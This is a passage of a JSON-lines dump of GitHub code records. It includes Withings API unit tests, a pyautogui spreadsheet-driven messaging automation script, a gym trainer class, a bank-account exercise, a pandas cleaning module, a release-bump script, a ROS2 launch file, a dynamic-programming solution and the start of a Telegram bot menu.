\"https://mockurl.com\"\n params = {\"mock\": \"params\"}\n verb = \"GET\"\n\n with patch.object(auth_client._http, \"request\", return_value=mock_resp) as mock:\n resp = auth_client._handle_http(verb, url, params)\n\n mock.assert_called_once_with(verb, url, params=params)\n assert resp.is_success is True\n assert resp.json() == {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n\n\ndef test_auth_client_handle_http_failure(auth_client: _AuthClient) -> None:\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 1, \"body\": {\"mock\": \"body\"}}\n\n with patch.object(auth_client, \"get_headers\", return_value={}):\n with patch.object(auth_client._http, \"request\", return_value=mock_resp):\n with pytest.raises(ValueError, match=\"^Failed\"):\n auth_client._handle_http(\"GET\", \"mock\", {})\n\n\ndef test_withings_provider_handle_http(provider: WithingsProvider) -> None:\n mock_headers = {\"Authorization\": \"Bearer mocktoken\"}\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n url = \"https://mockurl.com\"\n params = {\"mock\": \"params\"}\n verb = \"GET\"\n\n with patch.object(provider._auth_client, \"get_headers\", return_value=mock_headers):\n with patch.object(provider._http, \"request\", return_value=mock_resp) as mock:\n resp = provider._handle_http(verb, url, params)\n\n mock.assert_called_once_with(verb, url, headers=mock_headers, params=params)\n assert resp.is_success is True\n assert resp.json() == {\"status\": 0, \"body\": {\"mock\": \"body\"}}\n\n\ndef test_withings_provider_handle_http_failure(provider: WithingsProvider) -> None:\n mock_resp = MagicMock(status_code=200, json=MagicMock())\n mock_resp.json.return_value = {\"status\": 1, \"body\": {\"mock\": \"body\"}}\n\n with patch.object(provider._auth_client, \"get_headers\", return_value={}):\n with patch.object(provider._http, \"request\", return_value=mock_resp):\n with pytest.raises(ValueError, match=\"^Failed\"):\n provider._handle_http(\"GET\", \"mock\", {})\n\n\ndef test_withings_provider_activity_list(provider: WithingsProvider) -> None:\n # NOTE: This will fail if run between 23:59:59 and 00:00:00\n resp = MOCK_ACTIVITY_RESPONSE\n url = f\"{withings_provider.BASE_URL}/v2/measure\"\n days = 12\n starttime = int(time.time()) - (days * 24 * 60 * 60)\n expected = [Activity(**activity) for activity in MOCK_ACTIVITY_RESPONSE]\n\n params = {\n 
\"action\": \"getactivity\",\n \"startdateymd\": time.strftime(\"%Y-%m-%d\", time.localtime(starttime)),\n \"enddateymd\": time.strftime(\"%Y-%m-%d\", time.localtime()),\n \"data_fields\": \",\".join(withings_provider.DATA_FIELDS),\n }\n\n with patch.object(provider, \"_handle_paginated\", return_value=resp) as mock_http:\n result = provider.activity_list(days)\n\n assert result == expected\n mock_http.assert_called_once_with(\"activities\", \"POST\", url, params)\n\n\ndef test_withings_provider_handle_paginated(provider: WithingsProvider) -> None:\n side_effect = [\n MagicMock(status_code=200, json=MagicMock()),\n MagicMock(status_code=200, json=MagicMock()),\n ]\n side_effect[0].json.return_value = {\n \"status\": 0,\n \"body\": {\"more\": True, \"offset\": 1, \"series\": [1]},\n }\n side_effect[1].json.return_value = {\n \"status\": 0,\n \"body\": {\"more\": False, \"offset\": 2, \"series\": [2]},\n }\n expected = [1, 2]\n\n with patch.object(provider, \"_handle_http\", side_effect=side_effect) as mock_http:\n result = provider._handle_paginated(\n label=\"series\",\n verb=\"POST\",\n url=\"mockurl\",\n params={\"mock\": \"params\"},\n )\n\n assert result == expected\n assert mock_http.call_count == 2\n\n\ndef test_withings_provider_user(provider: WithingsProvider) -> None:\n mock_user = _AuthedUser.from_dict(MOCK_AUTH_RESPONSE[\"body\"])\n provider._auth_client._authed_user = mock_user\n\n user = provider.user\n\n assert user.userid == mock_user.userid\n assert user.refresh_token == mock_user.refresh_token\n\n\ndef test_withings_provider_user_no_auth(provider: WithingsProvider) -> None:\n provider._auth_client._authed_user = None\n\n with pytest.raises(ValueError, match=\"^Not authenticated\"):\n provider.user\n\n\ndef test_withings_provider_get_authentication_url(provider: WithingsProvider) -> None:\n state = \"mockstate\"\n redirect_uri = \"https://mockurl.com\"\n scope = \"mockscope\"\n\n with patch.object(provider._auth_client, \"create_state_code\", return_value=state):\n with patch.object(provider._auth_client, \"get_authorization_url\") as mock:\n url = provider.get_authentication_url(redirect_uri, scope)\n\n mock.assert_called_once_with(redirect_uri, scope, state)\n assert url == mock.return_value\n assert provider._last_state == state\n\n\ndef test_withings_provider_authenticate(provider: WithingsProvider) -> None:\n code = \"mockcode\"\n state = \"mockstate\"\n redirect_uri = \"https://mockurl.com\"\n provider._last_state = state\n\n with patch.object(provider._auth_client, \"authenticate\") as mock:\n provider.authenticate(code, state, redirect_uri)\n\n mock.assert_called_once_with(code, redirect_uri)\n\n\ndef test_withings_provider_authenticate_bad_state(provider: WithingsProvider) -> None:\n code = \"mockcode\"\n state = \"mockstate\"\n redirect_uri = \"https://mockurl.com\"\n provider._last_state = \"badstate\"\n\n with pytest.raises(ValueError, match=\"^Invalid state\"):\n provider.authenticate(code, state, redirect_uri)\n\n\n# TODO: Move to where authentication happens\ndef test_split_response() -> None:\n response = \"https://localhost:8080/?code=foo&state=bar\"\n expected = (\"foo\", \"bar\")\n result = withings_provider.split_response(response)\n\n assert result == expected\n\n\n# TODO: Move to where authentication happens\ndef test_get_response_url() -> None:\n url = \"https://account.withings.com/oauth2_user/authorize2\"\n expected = \"https://localhost:8080/?code=foo&state=bar\"\n\n with patch(\"builtins.input\", return_value=expected):\n result = 
withings_provider.get_response_url(url)\n\n    assert result == expected\n","repo_name":"Preocts/egg-stats","sub_path":"tests/withings_provider_test.py","file_name":"withings_provider_test.py","file_ext":"py","file_size_in_byte":16955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"23096569088","text":"import os\n\nimport openpyxl\nimport pyautogui\nimport threading\nimport time\nimport inspect\nimport ctypes\nimport pyperclip\nfrom configobj import ConfigObj\n\n\ndef _async_raise(tid, exctype):\n    \"\"\"raises the exception, performs cleanup if needed\"\"\"\n\n    tid = ctypes.c_long(tid)\n\n    if not inspect.isclass(exctype):\n        exctype = type(exctype)\n\n    res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))\n\n    if res == 0:\n\n        raise ValueError(\"invalid thread id\")\n\n    elif res != 1:\n\n        # \"\"\"if it returns a number greater than one, you're in trouble,\n\n        # and you should call it again with exc=NULL to revert the effect\"\"\"\n\n        ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\n\n        raise SystemError(\"PyThreadState_SetAsyncExc failed\")\n\n\ndef stop_thread(thread):\n    _async_raise(thread.ident, SystemExit)\n\n\nclass Job(threading.Thread):\n\n    def __init__(self, *args, **kwargs):\n        super(Job, self).__init__(*args, **kwargs)\n        # flag used to pause the thread\n        self.__flag = threading.Event()\n        self.__flag.set()  # set to True\n        # flag used to stop the thread\n        self.__running = threading.Event()\n        self.__running.set()  # set running to True\n\n    def run(self):\n        config1 = ConfigObj(\"./config/表格配置.ini\", encoding=\"UTF8\")\n        config2 = ConfigObj(\"./config/坐标配置.ini\", encoding=\"UTF8\")\n        zblen = config2['len']['all']\n        value = config1['BG']\n        bgpath = value['1']\n        if not os.path.exists(bgpath):\n            pyautogui.alert(text='没有找到表格文件~', title='警告', button='OK')\n            self.stop()\n        farenLie = value['2']\n        sjhLie = value['3']\n        kaishi = value['4']\n        jieshu = value['5']\n        xingxi = str(value['7']) + str(value['8'])\n        kongge = ' ' * int(value['9'])\n        gongsi = value['10']\n        needgongsi = str(config1['BG2']['1'])\n        pbpath = str(config1['BG2']['2'])\n        workbook = openpyxl.load_workbook(bgpath)\n        sheet = workbook.worksheets[0]\n        i = int(kaishi)\n        while self.__running.isSet():\n            if i <= int(jieshu):\n                farenName = str(sheet.cell(row=i, column=int(farenLie)).value)\n                phoneNum = str(sheet.cell(row=i, column=int(sjhLie)).value)\n                companyName = str(sheet.cell(row=i, column=int(gongsi)).value)\n                resPaiban = paiban(pbpath,companyName)\n                if len(farenName) == 2:\n                    farenName = farenName[0] + kongge + farenName[1]\n                for j in range(0, int(zblen)):\n                    index = str(j + 1)\n                    x = config2['X'][index]\n                    y = config2['Y'][index]\n                    event = config2['event'][index]\n                    sleepNum = config2['sleep'][index]\n                    copytext = str(config2['copy'][index])\n                    if '>法人的姓+' in copytext:\n                        wb = farenName[0]+copytext.split('+')[1]\n                        pyperclip.copy(wb)\n                    elif copytext == '>法人':\n                        pyperclip.copy(farenName)\n                    elif copytext == '>电话':\n                        pyperclip.copy(phoneNum)\n                    elif copytext == '>彩信内容':\n                        caixing = farenName[0] + xingxi\n                        pyperclip.copy(caixing)\n                    elif copytext == '>字号':\n                        if needgongsi == '是':\n                            zihao = resPaiban[1]\n                            pyperclip.copy(zihao)\n                    elif copytext == '>公司名称':\n                        if needgongsi == '是':\n                            companyName = resPaiban[0]\n                            pyperclip.copy(companyName)\n                    elif copytext == '无':\n                        pass\n                    else:\n                        pyperclip.copy(copytext)\n                    # perform the automated action\n                    if self.__running.isSet():\n                        autoFun(int(x), int(y), event, float(sleepNum))\n                # save progress (the row to resume from); i += 1 moves on to the next record\n                value['4'] = i\n                value['6'] = i\n                config1.write()\n                i = i + 1\n            if i >= int(jieshu) 
+ 1:\n                pyautogui.alert(text='执行完毕', title='提示', button='OK')\n                self.stop()\n\n    def pause(self):\n        self.__flag.clear()  # set to False to block the thread\n\n    def resume(self):\n        self.__flag.set()  # set to True to unblock the thread\n\n    def stop(self):\n        self.__flag.set()  # restore the thread from the paused state, if it was paused\n        self.__running.clear()  # set to False\n\n    def killme(self):\n        stop_thread(self)\n\n\n######## automation functions\n### dispatch a single automation event\ndef autoFun(x, y, event, sleepNum):\n    time.sleep(sleepNum)\n    if event == '鼠标左键双击':\n        pyautogui.doubleClick(x=x, y=y, button=\"left\")\n    elif event == '鼠标左键单击':\n        pyautogui.click(x=x, y=y)\n    elif event == '鼠标右键单击':\n        pyautogui.click(x=x, y=y, button='right')\n    elif event == '鼠标移动到':\n        pyautogui.moveTo(x, y)\n    elif '>' in event:\n        keywords = str(event).replace('>', '')\n        lists = keywords.split('+')\n        for i in lists:\n            time.sleep(0.2)\n            pyautogui.keyDown(i)\n        for i in lists:\n            time.sleep(0.2)\n            pyautogui.keyUp(i)\n    else:\n        pass\n\n##########\n### company name formatting\ndef paiban(path, faren):\n    f = open(path, 'r', encoding='utf-8')\n    pblist = []\n    cnt = 0\n    zuida = 0\n    resstr = ''\n    zihao = ''\n    for i in f:\n        if cnt == 0:\n            zuida = int(i.split('|')[1])\n            zihao = int(i.split('|')[3])\n            cnt += 1\n        else:\n            sp = i.replace('\\n', '').split('|')\n            pblist.append(sp)\n    cnt = 0\n    flag = False\n    for i in pblist:\n        if len(i[1].replace(' ', '')) == len(str(faren)):\n            zihao = i[2]\n            for k in i[1]:\n                if k != 'A':\n                    resstr += k\n                else:\n                    resstr += faren[cnt]\n                    cnt += 1\n                    flag = True\n                    break\n        if flag:\n            break\n    if not flag:\n        resstr = faren\n    if len(str(resstr))>zuida:\n        resstr = resstr[0:zuida]\n    f.close()\n    return [resstr, int(zihao)]","repo_name":"AJAskr/Ps-SendSSM","sub_path":"Ps-SendSSM/aotuJob.py","file_name":"aotuJob.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"7462549854","text":"from User import User\nfrom CustomerDatabase import customer_database\nfrom EmployeeSchedule import employee_schedule\nfrom pprint import pprint\n\nclass Trainer(User):\n    def __init__(self, name, email, password):\n        User.__init__(self, name, email, password, 'trainer')\n\n    '''\n    ----------------------------------------------------------------------------\n    update_customer_bench_press function\n    requests input of customer's name and new bench press weight to change that\n    customer object's bench press weight\n    '''\n    def update_customer_bench_press(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_bench_press = input('Updated Bench Press Weight:\\n')\n        customer_database.individuals[name].training_progress.update_bench_press(new_bench_press)\n\n    '''\n    ----------------------------------------------------------------------------\n    update_customer_bench_press_goal function\n    requests input of customer's name and new bench press goal weight to change that\n    customer object's bench press goal weight\n    '''\n    def update_customer_bench_press_goal(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_bench_press_goal = input('Updated Bench Press Weight Goal:\\n')\n        customer_database.individuals[name].training_progress.update_bench_press_goal(new_bench_press_goal)\n    \n    '''\n    ----------------------------------------------------------------------------\n    update_customer_squat function\n    requests input of customer's name and new squat weight to change that\n    customer object's squat weight\n    '''\n    def update_customer_squat(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_squat = input('Updated Squat Weight:\\n')\n        
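# persist the new value on the customer's training_progress record\n        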
customer_database.individuals[name].training_progress.update_squat(new_squat)\n    '''\n    ----------------------------------------------------------------------------\n    update_customer_squat_goal function\n    requests input of customer's name and new squat goal weight to change that\n    customer object's squat goal weight\n    '''\n    def update_customer_squat_goal(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_squat_goal = input('Updated Squat Weight Goal:\\n')\n        customer_database.individuals[name].training_progress.update_squat_goal(new_squat_goal)\n    \n    '''\n    ----------------------------------------------------------------------------\n    update_customer_mile_time function\n    requests input of customer's name and new mile time to change that\n    customer object's mile time\n    '''\n    def update_customer_mile_time(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_time = input('Updated Mile Time:\\n')\n        customer_database.individuals[name].training_progress.update_mile_time(new_time)\n\n    '''\n    ----------------------------------------------------------------------------\n    update_customer_mile_time_goal function\n    requests input of customer's name and new mile time goal to change that\n    customer object's mile time goal\n    '''\n    def update_customer_mile_time_goal(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_time_goal = input('Updated Mile Time Goal:\\n')\n        customer_database.individuals[name].training_progress.update_mile_time_goal(new_time_goal)\n\n    '''\n    ----------------------------------------------------------------------------\n    update_customer_weight function\n    requests input of customer's name and new weight to change that\n    customer object's current weight\n    '''\n    def update_customer_weight(self):\n        name = input('Customer Name:\\n')\n        name = name.lower()\n        new_weight = input('Updated Customer Weight:\\n')\n        customer_database.individuals[name].training_progress.update_weight(new_weight)\n\n    '''\n    ----------------------------------------------------------------------------\n    display_customer_progress function\n    requests input of customer's name and calls the training_progress class to use\n    the display_training_progress function and display the customer object's stats\n    '''\n    def display_customer_progress(self):\n        customer_name = input('Customer Name:\\n')\n        customer_name = customer_name.lower()\n\n        if customer_name in customer_database.individuals.keys():\n            customer_database.individuals[customer_name].training_progress.display_training_progress()\n        else:\n            print('Customer not recognized.')\n    \n    '''\n    ----------------------------------------------------------------------------\n    display_my_schedule function\n    displays the current employee's schedule based on the name of the employee\n    '''\n    def display_my_schedule(self):\n        employee_schedule.display_employee_schedule(self.name)\n","repo_name":"chloelfr/SoftwareEngineeringProjet","sub_path":"panther-fitness-master/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"19069639095","text":"class Account:\n    def __init__(self, owner, balance):\n        self.owner = owner\n        self.balance = balance\n    def deposit(self, amount):\n        self.balance = amount + self.balance\n        print(f\"Deposit accepted! \\nYour new balance is {self.balance}\\n\")\n    def withdraw(self, amount):\n        if not amount > self.balance:\n            self.balance = self.balance - amount\n            print(f\"Withdrawal accepted! 
\\nYour new balance is {self.balance}\\n\")\n        else:\n            print(\"Funds unavailable! \\nSorry, the amount you want to withdraw exceeds your available balance!\")\n    def __str__(self):\n        return f\"Account owner: {self.owner} \\nAccount balance: {self.balance}\\n\"\n\n\nacct1 = Account('Jose', 100)\nprint(acct1)\nacct1.deposit(50)\nacct1.withdraw(75)\nacct1.withdraw(500)\n","repo_name":"deji-dd/Python_Bootcamp","sub_path":"35: Object Oriented Programming Challenge.py","file_name":"35: Object Oriented Programming Challenge.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"18796302721","text":"\"\"\"\nThis is a module that houses all of the pandas data manipulation processes, including cleaning, encoding, \nshape changing, and more. The purpose of separating the following functionalities is to ensure the code \nis reusable, and to support scalable future projects. Each sub-class is a particular view for a specific \nusage. (e.g. feed_data_decision_tree is a machine learning model ready setup)\n\"\"\"\n\n# Importing libraries\nimport pandas as pd\nfrom pandas.api.types import is_string_dtype\nfrom pandas.api.types import is_numeric_dtype\nimport numpy as np\n\nimport os\nimport glob\nfrom datetime import datetime \n\n\n\ncleaningDict = {\n    '64150, MO' : 'RIVERSIDE, MO',\n    '95678, CA' : 'ROSEVILLE, CA',\n    '15801, PA' : 'DUBOIS, PA'\n}\n\n\"\"\"\nInitiating all the reference data first for usages. Creating a reference data for cleaning zip code manually for now\nsince we don't have an approved API for this project.\n\"\"\"\n\nbinary_encoding_map = {\n    'Y' : 1,\n    'N' : 0,\n    'Engaged' : 1,\n    'Not engaged' : 0\n}\n\n\"\"\"\nInitiating the mapping for conversion\n\"\"\"\n\ndriver_columns = [\n    'email_open', 'web_visit', \n    'webcast_attendee', 'marketing_engaged'\n    ]\n\n\"\"\"\nCreating a binary column list for ease of usages\n\"\"\"\n\n#Creating all the data loading methods\n# Defining data loading functions\n\ndef read_file(data_file):\n    \"\"\"\n    Function to read one data file with the custom setup\n    \"\"\"\n    df = pd.read_csv(data_file, delimiter=\";\")\n    return df\n\ndef read_all_files(data_folder):\n    \"\"\"\n    Function to get all the data files of a target type and load them into a single dataframe\n    \"\"\"\n    # Scanning for all the data files\n    dataPaths = glob.glob(data_folder + \"/*.txt\")\n\n    # Loading in the data\n    listOfFrames = []\n    for i in dataPaths:\n        tdf = pd.read_csv(i, sep=\";\")\n        tdf['source_file'] = i # Adding source file as a column for ease of tracking\n        listOfFrames.append(tdf)\n    \n    # Combining all the dataframes\n    df = pd.concat(listOfFrames, ignore_index=True)\n    return df\n\n\n# Using a dictionary to map input methods\ninput_methods = {\n    'txt' : read_file, # if it's a txt file, just use read csv\n    '' : read_all_files # if it's a directory, use glob to read everything\n}\n\n\nclass house_of_data(object):\n    \"\"\"\n    Collection of data with each method as a stage of data manipulation process or metrics output.\n    \"\"\"\n\n    def __init__(self, DataInput):\n        # first validating the input to see which method to use\n        inputType = os.path.splitext(DataInput)[-1]\n        if inputType == \".txt\":\n            read_method = input_methods.get('txt')\n        else:\n            read_method = input_methods.get('')\n\n        # Actually initiating the object attributes\n        self._DataInput = DataInput\n        self._RawData = read_method(DataInput)\n\n    def cleaning(self):\n        \"\"\"\n        Performing all the cleaning steps related to this dataset\n        \"\"\"\n        df = 
self._RawData.drop_duplicates().copy() #Creating a copy of the drop_dup dataframe\n # Run a for-loop to go through string columns\n # and strip the leading and trailing whitespaces\n\n for i in df.columns:\n if is_string_dtype(df[i]): # if it's a string column\n df[i] = df[i].str.strip() # strip out the white spaces\n else:\n pass\n \n # resetting index after the drop duplicates\n df = df.reset_index(drop=True)\n\n # Cleaning up the duplicated states in cell\n df['city_state'] = df['city_state'].str.replace(\"WASHINGTON, DC, DC\", \"WASHINGTON DC, DC\")\n df['city_state'] = df['city_state'].str.replace(\"KNOXVILLE, TN, TN\", \"KNOXVILLE, TN\")\n\n # Performing the zip code cleaning\n df['city_state'] = df['city_state'].replace(cleaningDict)\n\n # Saving it to the object\n self._clean_df = df\n\n def other_data_validations(self):\n \"\"\"\n Ensure new incoming data does not have new violations or needed updates.\n \"\"\"\n checker = []\n # Checking if the broker ID is a number\n checker.append(is_numeric_dtype(self._clean_df['broker_name'].str.split(\"Broker\", expand=True)[1].astype(float)))\n # Checking if the broker name is correct\n checker.append(len(self._clean_df['broker_name'].str.split(\"Broker\", expand=True).columns) == 2)\n # Checking if the city states only have one comma\n checker.append(len(self._clean_df['city_state'].str.split(\", \", expand=True).columns) == 2)\n # Checking if the city state column contains numbers (zip codes)\n mask = self._clean_df['city_state'].str.split(\", \", expand=True)[0].str.isnumeric()\n checker.append(len(self._clean_df[mask]) == 0)\n # Checking if the prefix is a character per describe\n mask1 = self._clean_df['territory'].str[0].str.isalpha() == False\n mask2 = self._clean_df['territory'].str[0] != \"I\"\n mask3 = self._clean_df['territory'].str[0] != \"W\"\n checker.append(len(self._clean_df.loc[mask1, 'territory']) == 0)\n checker.append(len(self._clean_df.loc[mask2&mask3, 'territory']) == 0)\n # Checking fund category column\n mask4 = self._clean_df['fund_category'].str.isnumeric() == True\n checker.append(len(self._clean_df.loc[mask4, 'fund_category']) == 0) # use mask4 here; mask is the zip-code check above\n checker.append(is_numeric_dtype(self._clean_df['firm_x_sales']))\n checker.append(is_numeric_dtype(self._clean_df['total_industry_sales']))\n\n # Checking binary columns\n bin_check = True\n for i in driver_columns:\n if len(self._clean_df[i].unique()) == 2:\n pass\n else:\n bin_check = False\n print(f\"{i} is not binary\")\n break\n\n checker.append(bin_check)\n\n return checker\n\n\n def enrichment(self):\n \"\"\"\n Built on top of the clean_df, this is going to split out the analytics\n columns\n \"\"\"\n # Creating a copy of the clean dataframe for enrichment\n self.cleaning()\n df = self._clean_df.copy()\n\n # Binary encode all the binary categorical variables\n df[driver_columns] = df[driver_columns].replace(binary_encoding_map)\n \n # Splitting out the states since the city_state information is too granular for overview\n df['state'] = df['city_state'].str.split(\", \", expand=True)[1]\n \n # Splitting out the Channel\n df['i_or_w'] = df['territory'].str[0]\n I_OR_W = {\n \"I\" : 1,\n \"W\" : 0\n }\n\n df['i_or_w'] = df['i_or_w'].replace(I_OR_W)\n \n # Initiating a filter to exclude all the no sales generated records\n mask = df['firm_x_sales'] > 0\n significant_cut = df[mask]['firm_x_sales'].quantile(0.2)\n # Initiating a filter with the twenty percentile cut\n mask1 = df['firm_x_sales'] > significant_cut\n # Performing the filter and label\n df['effective_sale'] = 0\n 
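# default every row to 0 (not effective); mask1 rows are flagged 1 on the next line (a hypothetical equivalent one-liner: df['effective_sale'] = (df['firm_x_sales'] > significant_cut).astype(int))\n 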
df.loc[mask1,'effective_sale'] = 1\n \n # Since driver_columns already lists the binary driver columns\n # we will utilize that to create driver_pattern\n df['driver_pattern'] = df[driver_columns].apply(tuple,axis=1)\n \n df = df.reset_index(drop=True)\n # Save the enriched dataframe to the house\n self._enriched_df = df\n \n\n\n\n def get_metrics(self):\n \"\"\"\n Printing an output of quick metrics\n \"\"\"\n pass\n\n\n\n\nif __name__ == \"__main__\":\n import sys\n script, data_input = sys.argv","repo_name":"spencertse122/BI_SalesChannel_Classifier","sub_path":"DataModels/models/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}\n{"seq_id":"24910089079","text":"# -*- coding: utf-8 -*-\n\n\nsquares = [1, 4, 9, 16, 25]\n# print(squares)\n\na=1\nb=a\n\nref_squares = squares\nval_squares = squares[:] \n\n\n# ref_squares[0]=52\n# print(\"ref_squares\",ref_squares)\n# print(\"squares\",squares)\n\n# val_squares[0]=22\n# print(\"val_squares\",val_squares)\n# print(\"squares\",squares)\n\narr_1 = [1,2]\narr_2 = [3,4]\narr = [arr_1,arr_2]\nval_arr = arr[:] \narr_1[0]=22\nprint(\"arr\",arr)\nprint(\"val_arr\",val_arr)\nval_arr.append(7)\nprint(\"val_arr\",val_arr)\n\nletters = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\nletters[2:5] = ['C']\n\nprint(letters)","repo_name":"fgaurat/formationpython2","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}\n{"seq_id":"15895110814","text":"#!/usr/bin/env python\n\nimport getopt, sys\nimport re\nimport subprocess\n\n\ndef usage():\n print(\n \"\"\"\n You can use the scripts as follows\n ./update-release.py -v v1.5.0\n \"\"\"\n )\n\n\ndef replace_on(file, pattern, new_value):\n with open(file, \"r+\") as file:\n content = file.read()\n new_content = re.sub(pattern, new_value, content)\n file.seek(0)\n file.write(new_content)\n\n\ndef replace_version_on_config_py(version: str):\n file_name = \"doc/source/conf.py\"\n replace_on(file_name, r\"release = '(\\d+).(\\d+).(\\d+)'\", f\"release = '{version}'\")\n\n\ndef replace_version_on_setup_py(version: str):\n file_name = \"setup.py\"\n replace_on(file_name, r\"version='(\\d+).(\\d+).(\\d+)'\", f\"version='{version}'\")\n\n\ndef replace_version_on_changelog_gen(version: str):\n file_name = \".github_changelog_generator\"\n replace_on(\n file_name, r\"future-release=v(\\d+).(\\d+).(\\d+)\", f\"future-release={version}\"\n )\n\n\ndef update_version_on_pyproject_toml(version: str):\n shell([\"poetry\", \"version\", version])\n\n\ndef shell(command):\n return subprocess.run(command, text=True)\n\n\ndef main():\n version = None\n try:\n options, args = getopt.getopt(sys.argv[1:], \"v:\", [\"version=\"])\n except getopt.GetoptError as err:\n # print help information and exit:\n print(err) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\n\n for option, value in options:\n if option in (\"-v\", \"--version\"):\n version = value\n else:\n assert False, \"Unhandled option\"\n\n if not version:\n usage()\n sys.exit(2)\n\n version_number = version[1:] if \"v\" in version else version\n replace_version_on_setup_py(version_number)\n replace_version_on_config_py(version_number)\n replace_version_on_changelog_gen(version)\n update_version_on_pyproject_toml(version_number)\n\n\nif __name__ == \"__main__\":\n 
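# entry point sketch: parses -v/--version via getopt above; note shell() assumes the poetry CLI is on PATH (subprocess.run raises FileNotFoundError if it is missing)\n 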
main()\n","repo_name":"didix21/mdutils","sub_path":"scripts/update-release.py","file_name":"update-release.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"18"} +{"seq_id":"29544889048","text":"from launch_ros.actions import Node\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument\nfrom launch_ros.substitutions import FindPackageShare\nfrom launch.substitutions import LaunchConfiguration, PathJoinSubstitution\n\ndef generate_launch_description():\n \n launch_args = [\n DeclareLaunchArgument(\n 'use_sim_time',\n default_value='false',\n description='Use simulation (Gazebo) clock if true'),\n\n DeclareLaunchArgument(\n 'cloud_in',\n default_value='velodyne_points',\n description='The topic on which to listen for the pointcloud data'\n ),\n\n DeclareLaunchArgument(\n 'config_file',\n default_value='octomap_params.yaml',\n description='The file within the /spot_navigation/config folder with which to look for params'\n ),\n ]\n\n octomap_server = Node(\n package=\"octomap_server\",\n executable=\"octomap_server_node\",\n name=\"octomap_server_node\",\n parameters=[\n PathJoinSubstitution([FindPackageShare('spot_navigation'), 'config', LaunchConfiguration('config_file')])\n ],\n remappings=[\n ('cloud_in', LaunchConfiguration('cloud_in'))\n ]\n )\n\n return LaunchDescription([\n *launch_args,\n octomap_server\n ])\n\n","repo_name":"Caleb-Horan/Spot_Manipulator_Optimization","sub_path":"install/spot_navigation/share/spot_navigation/launch/octomap.launch.py","file_name":"octomap.launch.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4446024279","text":"\"\"\"\n위쪽 대각선 오른쪽(dp[i-1][j-1]), 위쪽 대각선 왼쪽(dp[i-1][j]) 중\nmax를 이용하여 큰 값만 추출하고, 현재 위치의 값(triangle[i - 1][j - 1]) 을 더해주는 식으로 최대값을 찾음.\n-> sum[i][j] = max(sum[i-1][j-1],sum[i-1][j]) + tri[i-1][j-1]\n\nmax(dp[i - 1][j - 1], dp[i - 1][j]) 에서 IndexError를 방지하기 위해서.. 배열 크기를 n+1 크기로 정의하고 가장 위쪽에 padding을 추가하였고,\n실제 계산을 1부터 n+1까지(n번) 돌면서 계산하도록 구현하였다. 
1부터 시작하기 때문에 triangle[i][j]가 아닌 triangle[i - 1][j - 1] 가 되었음.\n\n최종적으로 dp를 출력해보면 아래와 같다.\n[[0, 0, 0, 0, 0, 0], [0, 7, 0, 0, 0, 0], [0, 10, 15, 0, 0, 0], [0, 18, 16, 15, 0, 0], [0, 20, 25, 20, 19, 0], [0, 24, 30, 27, 26, 24]]\n\"\"\"\n\ndef solution(triangle):\n n = len(triangle)\n dp = [[0 for _ in range(n + 1)] for _ in range(n + 1)]\n for i in range(1, n + 1):\n for j in range(1, i + 1):\n dp[i][j] = max(dp[i - 1][j - 1], dp[i - 1][j]) + triangle[i - 1][j - 1]\n return max(dp[-1])\n\n\nt = [[7], [3, 8], [8, 1, 0], [2, 7, 4, 4], [4, 5, 2, 6, 5]]\nprint(solution(t))","repo_name":"prography-6th-study/algorithm-code","sub_path":"seongwoo/3-정수삼각형.py","file_name":"3-정수삼각형.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"13669028311","text":"from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom flows.callbacks import Callbacks\nfrom flows.main_menu import main_menu\nfrom models.User import User\nfrom planfix.planfix import create_club_task\n\nuser_dict = {}\nbot_dict = {}\n\nfirst_message = \"Правовой клуб – это сообщество профессиональных юристов и адвокатов, которые готовы обмениваться опытом друг с другом.\" \\\n \"\\n\\nПреимущества клуба:\" \\\n \"\\n\\n• Егор Редин делится запросами из СМИ для юристов и адвокатов\" \\\n \"\\n\\n• Егор рассказывает о своем опыте управления юридической фирмой\" \\\n \"\\n\\n• Егор передает клиентов, которых не успевает обработать самостоятельно\" \\\n \"\\n\\n• Мы организуем образовательные онлайн и крутые досуговые оффлайн встречи для членов клуба\" \\\n \"\\n\\n• Все образовательные продукты Егора Редина предоставляются членам клуба с 25% скидкой\" \\\n \"\\n\\nИ все это цене 3х чашек кофе в месяц!\"\n\n\ndef other_club():\n markup = 